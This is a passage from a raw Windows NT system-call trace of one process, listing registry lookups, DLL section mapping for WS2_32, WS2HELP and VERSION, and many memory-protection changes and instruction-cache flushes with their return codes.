STATUS_OBJECT_NAME_NOT_FOUND 00610 896 NtOpenKey (0x9, {24, 28, 0x40, 0, 0, (0x9, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\OLEAUT\UserEra"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00611 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\OLEAUT"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00612 896 NtProtectVirtualMemory (-1, (0x400000), 400, 4, ... (0x400000), 4096, 2, ) == 0x0 00613 896 NtProtectVirtualMemory (-1, (0x401000), 143360, 64, ... (0x401000), 143360, 32, ) == 0x0 00614 896 NtFlushInstructionCache (-1, 5392901, 48, ... ) == 0x0 00615 896 NtFlushInstructionCache (-1, 5392901, 80, ... ) == 0x0 00616 896 NtFlushInstructionCache (-1, 5392949, 71, ... ) == 0x0 00617 896 NtFlushInstructionCache (-1, 5392981, 82, ... ) == 0x0 00618 896 NtFlushInstructionCache (-1, 5393020, 43, ... ) == 0x0 00619 896 NtFlushInstructionCache (-1, 5393101, 95, ... ) == 0x0 00620 896 NtAllocateVirtualMemory (-1, 10375168, 0, 81920, 4096, 4, ... 10375168, 81920, ) == 0x0 00621 896 NtFlushInstructionCache (-1, 5393101, 210, ... ) == 0x0 00622 896 NtFreeVirtualMemory (-1, (0x9f5000), 8192, 16384, ... (0x9f5000), 8192, ) == 0x0 00623 896 NtFlushInstructionCache (-1, 5393196, 115, ... ) == 0x0 00624 896 NtFreeVirtualMemory (-1, (0x9e1000), 77824, 16384, ... (0x9e1000), 77824, ) == 0x0 00625 896 NtProtectVirtualMemory (-1, (0x424000), 8192, 64, ... (0x424000), 8192, 32, ) == 0x0 00626 896 NtFlushInstructionCache (-1, 5392901, 48, ... ) == 0x0 00627 896 NtFlushInstructionCache (-1, 5392901, 80, ... ) == 0x0 00628 896 NtFlushInstructionCache (-1, 5392949, 71, ... ) == 0x0 00629 896 NtFlushInstructionCache (-1, 5392981, 82, ... ) == 0x0 00630 896 NtFlushInstructionCache (-1, 5393020, 43, ... ) == 0x0 00631 896 NtFlushInstructionCache (-1, 5393101, 95, ... ) == 0x0 00632 896 NtFlushInstructionCache (-1, 5393101, 210, ... ) == 0x0 00633 896 NtFlushInstructionCache (-1, 5393196, 115, ... ) == 0x0 00634 896 NtProtectVirtualMemory (-1, (0x426000), 1007616, 64, ... (0x426000), 1007616, 128, ) == 0x0 00635 896 NtFlushInstructionCache (-1, 5392901, 48, ... ) == 0x0 00636 896 NtFlushInstructionCache (-1, 5392901, 80, ... ) == 0x0 00637 896 NtFlushInstructionCache (-1, 5392949, 71, ... ) == 0x0 00638 896 NtFlushInstructionCache (-1, 5392981, 82, ... ) == 0x0 00639 896 NtFlushInstructionCache (-1, 5393020, 43, ... ) == 0x0 00640 896 NtFlushInstructionCache (-1, 5393101, 95, ... ) == 0x0 00641 896 NtFlushInstructionCache (-1, 5393101, 210, ... ) == 0x0 00642 896 NtAllocateVirtualMemory (-1, 10358784, 0, 36864, 4096, 4, ... 10358784, 36864, ) == 0x0 00643 896 NtFreeVirtualMemory (-1, (0x96c000), 16384, 16384, ... (0x96c000), 16384, ) == 0x0 00644 896 NtFlushInstructionCache (-1, 5393196, 115, ... ) == 0x0 00645 896 NtFreeVirtualMemory (-1, (0x964000), 32768, 16384, ... (0x964000), 32768, ) == 0x0 00646 896 NtProtectVirtualMemory (-1, (0x400000), 400, 2, ... (0x400000), 4096, 4, ) == 0x0 00647 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "WS2_32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00648 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\WS2_32.dll"}, 1242152, ... ) }, 1242152, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00649 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WS2_32.dll"}, 1242152, ... ) }, 1242152, ... ) == 0x0 00650 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WS2_32.dll"}, 5, 96, ... 52, {status=0x0, info=1}, ) }, 5, 96, ... 52, {status=0x0, info=1}, ) == 0x0 00651 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 52, ... 56, ) == 0x0 00652 896 NtQuerySection (56, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 00653 896 NtClose (52, ... ) == 0x0 00654 896 NtMapViewOfSection (56, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71ab0000), 0x0, 94208, ) == 0x0 00655 896 NtClose (56, ... ) == 0x0 00656 896 NtProtectVirtualMemory (-1, (0x71ab1000), 468, 4, ... (0x71ab1000), 4096, 32, ) == 0x0 00657 896 NtProtectVirtualMemory (-1, (0x71ab1000), 4096, 32, ... (0x71ab1000), 4096, 4, ) == 0x0 00658 896 NtFlushInstructionCache (-1, 1907036160, 468, ... ) == 0x0 00659 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "WS2HELP.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00660 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\WS2HELP.dll"}, 1241336, ... ) }, 1241336, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00661 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WS2HELP.dll"}, 1241336, ... ) }, 1241336, ... ) == 0x0 00662 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WS2HELP.dll"}, 5, 96, ... 56, {status=0x0, info=1}, ) }, 5, 96, ... 56, {status=0x0, info=1}, ) == 0x0 00663 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 56, ... 52, ) == 0x0 00664 896 NtQuerySection (52, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 00665 896 NtClose (56, ... ) == 0x0 00666 896 NtMapViewOfSection (52, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71aa0000), 0x0, 32768, ) == 0x0 00667 896 NtClose (52, ... ) == 0x0 00668 896 NtProtectVirtualMemory (-1, (0x71aa1000), 352, 4, ... (0x71aa1000), 4096, 32, ) == 0x0 00669 896 NtProtectVirtualMemory (-1, (0x71aa1000), 4096, 32, ... (0x71aa1000), 4096, 4, ) == 0x0 00670 896 NtFlushInstructionCache (-1, 1906970624, 352, ... ) == 0x0 00671 896 NtProtectVirtualMemory (-1, (0x71ab1000), 468, 4, ... (0x71ab1000), 4096, 32, ) == 0x0 00672 896 NtProtectVirtualMemory (-1, (0x71ab1000), 4096, 32, ... (0x71ab1000), 4096, 4, ) == 0x0 00673 896 NtFlushInstructionCache (-1, 1907036160, 468, ... ) == 0x0 00674 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WS2HELP.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00675 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WS2_32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00676 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00677 896 NtQuerySystemInformation (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0 00678 896 NtProtectVirtualMemory (-1, (0x77c11014), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00679 896 NtProtectVirtualMemory (-1, (0x77c11014), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00680 896 NtProtectVirtualMemory (-1, (0x77c11020), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00681 896 NtProtectVirtualMemory (-1, (0x77c11020), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00682 896 NtProtectVirtualMemory (-1, (0x77c11024), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00683 896 NtProtectVirtualMemory (-1, (0x77c11024), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00684 896 NtProtectVirtualMemory (-1, (0x77c11034), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00685 896 NtProtectVirtualMemory (-1, (0x77c11034), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00686 896 NtProtectVirtualMemory (-1, (0x77c11038), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00687 896 NtProtectVirtualMemory (-1, (0x77c11038), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00688 896 NtProtectVirtualMemory (-1, (0x77c11050), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00689 896 NtProtectVirtualMemory (-1, (0x77c11050), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00690 896 NtProtectVirtualMemory (-1, (0x77c1107c), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00691 896 NtProtectVirtualMemory (-1, (0x77c1107c), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00692 896 NtProtectVirtualMemory (-1, (0x77c110b8), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00693 896 NtProtectVirtualMemory (-1, (0x77c110b8), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00694 896 NtProtectVirtualMemory (-1, (0x77c110c4), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00695 896 NtProtectVirtualMemory (-1, (0x77c110c4), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00696 896 NtProtectVirtualMemory (-1, (0x77c110d0), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00697 896 NtProtectVirtualMemory (-1, (0x77c110d0), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00698 896 NtProtectVirtualMemory (-1, (0x77c110d4), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00699 896 NtProtectVirtualMemory (-1, (0x77c110d4), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00700 896 NtProtectVirtualMemory (-1, (0x77c110d8), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00701 896 NtProtectVirtualMemory (-1, (0x77c110d8), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00702 896 NtProtectVirtualMemory (-1, (0x77c110e8), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00703 896 NtProtectVirtualMemory (-1, (0x77c110e8), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00704 896 NtProtectVirtualMemory (-1, (0x77c110f0), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00705 896 NtProtectVirtualMemory (-1, (0x77c110f0), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00706 896 NtProtectVirtualMemory (-1, (0x77c11174), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00707 896 NtProtectVirtualMemory (-1, (0x77c11174), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00708 896 NtProtectVirtualMemory (-1, (0x77c11198), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00709 896 NtProtectVirtualMemory (-1, (0x77c11198), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00710 896 NtProtectVirtualMemory (-1, (0x77c1119c), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00711 896 NtProtectVirtualMemory (-1, (0x77c1119c), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00712 896 NtProtectVirtualMemory (-1, (0x77c111a0), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00713 896 NtProtectVirtualMemory (-1, (0x77c111a0), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00714 896 NtProtectVirtualMemory (-1, (0x77c111a4), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00715 896 NtProtectVirtualMemory (-1, (0x77c111a4), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00716 896 NtProtectVirtualMemory (-1, (0x77c111ac), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00717 896 NtProtectVirtualMemory (-1, (0x77c111ac), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00718 896 NtProtectVirtualMemory (-1, (0x77c111b0), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00719 896 NtProtectVirtualMemory (-1, (0x77c111b0), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00720 896 NtProtectVirtualMemory (-1, (0x77c1121c), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00721 896 NtProtectVirtualMemory (-1, (0x77c1121c), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00722 896 NtProtectVirtualMemory (-1, (0x77c11238), 4, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00723 896 NtProtectVirtualMemory (-1, (0x77c11238), 4, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00724 896 NtProtectVirtualMemory (-1, (0x77dd142c), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00725 896 NtProtectVirtualMemory (-1, (0x77dd142c), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00726 896 NtProtectVirtualMemory (-1, (0x77dd1454), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00727 896 NtProtectVirtualMemory (-1, (0x77dd1454), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00728 896 NtProtectVirtualMemory (-1, (0x77dd1458), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00729 896 NtProtectVirtualMemory (-1, (0x77dd1458), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00730 896 NtProtectVirtualMemory (-1, (0x77dd145c), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00731 896 NtProtectVirtualMemory (-1, (0x77dd145c), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00732 896 NtProtectVirtualMemory (-1, (0x77dd1468), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00733 896 NtProtectVirtualMemory (-1, (0x77dd1468), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00734 896 NtProtectVirtualMemory (-1, (0x77dd14f0), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00735 896 NtProtectVirtualMemory (-1, (0x77dd14f0), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00736 896 NtProtectVirtualMemory (-1, (0x77dd14f8), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00737 896 NtProtectVirtualMemory (-1, (0x77dd14f8), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00738 896 NtProtectVirtualMemory (-1, (0x77dd1510), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00739 896 NtProtectVirtualMemory (-1, (0x77dd1510), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00740 896 NtProtectVirtualMemory (-1, (0x77dd1518), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00741 896 NtProtectVirtualMemory (-1, (0x77dd1518), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00742 896 NtProtectVirtualMemory (-1, (0x77dd1554), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00743 896 NtProtectVirtualMemory (-1, (0x77dd1554), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00744 896 NtProtectVirtualMemory (-1, (0x77dd159c), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00745 896 NtProtectVirtualMemory (-1, (0x77dd159c), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00746 896 NtProtectVirtualMemory (-1, (0x77dd15a0), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00747 896 NtProtectVirtualMemory (-1, (0x77dd15a0), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00748 896 NtProtectVirtualMemory (-1, (0x77dd15a4), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00749 896 NtProtectVirtualMemory (-1, (0x77dd15a4), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00750 896 NtProtectVirtualMemory (-1, (0x77dd15a8), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00751 896 NtProtectVirtualMemory (-1, (0x77dd15a8), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00752 896 NtProtectVirtualMemory (-1, (0x77dd15ac), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00753 896 NtProtectVirtualMemory (-1, (0x77dd15ac), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00754 896 NtProtectVirtualMemory (-1, (0x77dd15b0), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00755 896 NtProtectVirtualMemory (-1, (0x77dd15b0), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00756 896 NtProtectVirtualMemory (-1, (0x77dd15c8), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00757 896 NtProtectVirtualMemory (-1, (0x77dd15c8), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00758 896 NtProtectVirtualMemory (-1, (0x77dd15d8), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00759 896 NtProtectVirtualMemory (-1, (0x77dd15d8), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00760 896 NtProtectVirtualMemory (-1, (0x77dd15dc), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00761 896 NtProtectVirtualMemory (-1, (0x77dd15dc), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00762 896 NtProtectVirtualMemory (-1, (0x77dd15ec), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00763 896 NtProtectVirtualMemory (-1, (0x77dd15ec), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00764 896 NtProtectVirtualMemory (-1, (0x77dd15fc), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00765 896 NtProtectVirtualMemory (-1, (0x77dd15fc), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00766 896 NtProtectVirtualMemory (-1, (0x77dd1600), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00767 896 NtProtectVirtualMemory (-1, (0x77dd1600), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00768 896 NtProtectVirtualMemory (-1, (0x77dd1604), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00769 896 NtProtectVirtualMemory (-1, (0x77dd1604), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00770 896 NtProtectVirtualMemory (-1, (0x77dd1608), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00771 896 NtProtectVirtualMemory (-1, (0x77dd1608), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00772 896 NtProtectVirtualMemory (-1, (0x77dd160c), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00773 896 NtProtectVirtualMemory (-1, (0x77dd160c), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00774 896 NtProtectVirtualMemory (-1, (0x77dd1610), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00775 896 NtProtectVirtualMemory (-1, (0x77dd1610), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00776 896 NtProtectVirtualMemory (-1, (0x77dd1628), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00777 896 NtProtectVirtualMemory (-1, (0x77dd1628), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00778 896 NtProtectVirtualMemory (-1, (0x77dd162c), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00779 896 NtProtectVirtualMemory (-1, (0x77dd162c), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00780 896 NtProtectVirtualMemory (-1, (0x77dd1630), 4, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00781 896 NtProtectVirtualMemory (-1, (0x77dd1630), 4, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00782 896 NtProtectVirtualMemory (-1, (0x77e710dc), 4, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00783 896 NtProtectVirtualMemory (-1, (0x77e710dc), 4, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00784 896 NtProtectVirtualMemory (-1, (0x77e71124), 4, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00785 896 NtProtectVirtualMemory (-1, (0x77e71124), 4, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00786 896 NtProtectVirtualMemory (-1, (0x77e7112c), 4, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00787 896 NtProtectVirtualMemory (-1, (0x77e7112c), 4, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00788 896 NtProtectVirtualMemory (-1, (0x77e71130), 4, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00789 896 NtProtectVirtualMemory (-1, (0x77e71130), 4, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00790 896 NtProtectVirtualMemory (-1, (0x77e71154), 4, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00791 896 NtProtectVirtualMemory (-1, (0x77e71154), 4, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00792 896 NtProtectVirtualMemory (-1, (0x77e71178), 4, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00793 896 NtProtectVirtualMemory (-1, (0x77e71178), 4, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00794 896 NtProtectVirtualMemory (-1, (0x77e71184), 4, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00795 896 NtProtectVirtualMemory (-1, (0x77e71184), 4, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00796 896 NtProtectVirtualMemory (-1, (0x77e71194), 4, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00797 896 NtProtectVirtualMemory (-1, (0x77e71194), 4, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00798 896 NtProtectVirtualMemory (-1, (0x77e711ac), 4, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00799 896 NtProtectVirtualMemory (-1, (0x77e711ac), 4, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00800 896 NtProtectVirtualMemory (-1, (0x77e711f0), 4, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00801 896 NtProtectVirtualMemory (-1, (0x77e711f0), 4, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00802 896 NtProtectVirtualMemory (-1, (0x71aa10dc), 4, 4, ... (0x71aa1000), 4096, 32, ) == 0x0 00803 896 NtProtectVirtualMemory (-1, (0x71aa10dc), 4, 32, ... (0x71aa1000), 4096, 4, ) == 0x0 00804 896 NtProtectVirtualMemory (-1, (0x71aa10f4), 4, 4, ... (0x71aa1000), 4096, 32, ) == 0x0 00805 896 NtProtectVirtualMemory (-1, (0x71aa10f4), 4, 32, ... (0x71aa1000), 4096, 4, ) == 0x0 00806 896 NtProtectVirtualMemory (-1, (0x71aa10f8), 4, 4, ... (0x71aa1000), 4096, 32, ) == 0x0 00807 896 NtProtectVirtualMemory (-1, (0x71aa10f8), 4, 32, ... (0x71aa1000), 4096, 4, ) == 0x0 00808 896 NtProtectVirtualMemory (-1, (0x71aa1114), 4, 4, ... (0x71aa1000), 4096, 32, ) == 0x0 00809 896 NtProtectVirtualMemory (-1, (0x71aa1114), 4, 32, ... (0x71aa1000), 4096, 4, ) == 0x0 00810 896 NtProtectVirtualMemory (-1, (0x71aa112c), 4, 4, ... (0x71aa1000), 4096, 32, ) == 0x0 00811 896 NtProtectVirtualMemory (-1, (0x71aa112c), 4, 32, ... (0x71aa1000), 4096, 4, ) == 0x0 00812 896 NtProtectVirtualMemory (-1, (0x71aa1130), 4, 4, ... (0x71aa1000), 4096, 32, ) == 0x0 00813 896 NtProtectVirtualMemory (-1, (0x71aa1130), 4, 32, ... (0x71aa1000), 4096, 4, ) == 0x0 00814 896 NtProtectVirtualMemory (-1, (0x71aa1158), 4, 4, ... (0x71aa1000), 4096, 32, ) == 0x0 00815 896 NtProtectVirtualMemory (-1, (0x71aa1158), 4, 32, ... (0x71aa1000), 4096, 4, ) == 0x0 00816 896 NtProtectVirtualMemory (-1, (0x71ab115c), 4, 4, ... (0x71ab1000), 4096, 32, ) == 0x0 00817 896 NtProtectVirtualMemory (-1, (0x71ab115c), 4, 32, ... (0x71ab1000), 4096, 4, ) == 0x0 00818 896 NtProtectVirtualMemory (-1, (0x71ab1164), 4, 4, ... (0x71ab1000), 4096, 32, ) == 0x0 00819 896 NtProtectVirtualMemory (-1, (0x71ab1164), 4, 32, ... (0x71ab1000), 4096, 4, ) == 0x0 00820 896 NtProtectVirtualMemory (-1, (0x71ab1168), 4, 4, ... (0x71ab1000), 4096, 32, ) == 0x0 00821 896 NtProtectVirtualMemory (-1, (0x71ab1168), 4, 32, ... (0x71ab1000), 4096, 4, ) == 0x0 00822 896 NtProtectVirtualMemory (-1, (0x71ab1170), 4, 4, ... (0x71ab1000), 4096, 32, ) == 0x0 00823 896 NtProtectVirtualMemory (-1, (0x71ab1170), 4, 32, ... (0x71ab1000), 4096, 4, ) == 0x0 00824 896 NtProtectVirtualMemory (-1, (0x71ab1178), 4, 4, ... (0x71ab1000), 4096, 32, ) == 0x0 00825 896 NtProtectVirtualMemory (-1, (0x71ab1178), 4, 32, ... (0x71ab1000), 4096, 4, ) == 0x0 00826 896 NtProtectVirtualMemory (-1, (0x71ab119c), 4, 4, ... (0x71ab1000), 4096, 32, ) == 0x0 00827 896 NtProtectVirtualMemory (-1, (0x71ab119c), 4, 32, ... (0x71ab1000), 4096, 4, ) == 0x0 00828 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "VERSION.dll"}, ... 52, ) }, ... 52, ) == 0x0 00829 896 NtMapViewOfSection (52, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77c00000), 0x0, 32768, ) == 0x0 00830 896 NtClose (52, ... ) == 0x0 00831 896 NtProtectVirtualMemory (-1, (0x77c01000), 304, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00832 896 NtProtectVirtualMemory (-1, (0x77c01000), 4096, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00833 896 NtFlushInstructionCache (-1, 2009075712, 304, ... ) == 0x0 00834 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VERSION.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00835 896 NtProtectVirtualMemory (-1, (0x77c01020), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00836 896 NtProtectVirtualMemory (-1, (0x77c01020), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00837 896 NtProtectVirtualMemory (-1, (0x77c0102c), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00838 896 NtProtectVirtualMemory (-1, (0x77c0102c), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00839 896 NtProtectVirtualMemory (-1, (0x77c01030), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00840 896 NtProtectVirtualMemory (-1, (0x77c01030), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00841 896 NtProtectVirtualMemory (-1, (0x77c0103c), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00842 896 NtProtectVirtualMemory (-1, (0x77c0103c), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00843 896 NtProtectVirtualMemory (-1, (0x77c01044), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00844 896 NtProtectVirtualMemory (-1, (0x77c01044), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00845 896 NtProtectVirtualMemory (-1, (0x77c01048), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00846 896 NtProtectVirtualMemory (-1, (0x77c01048), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00847 896 NtProtectVirtualMemory (-1, (0x77c01050), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00848 896 NtProtectVirtualMemory (-1, (0x77c01050), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00849 896 NtProtectVirtualMemory (-1, (0x77c01054), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00850 896 NtProtectVirtualMemory (-1, (0x77c01054), 4, 32, ... (0x77c01000), 4096, 4, ) == 0x0 00851 896 NtProtectVirtualMemory (-1, (0x77c01078), 4, 4, ... (0x77c01000), 4096, 32, ) == 0x0 00852 896 NtProtectVirtualMemory (-1, 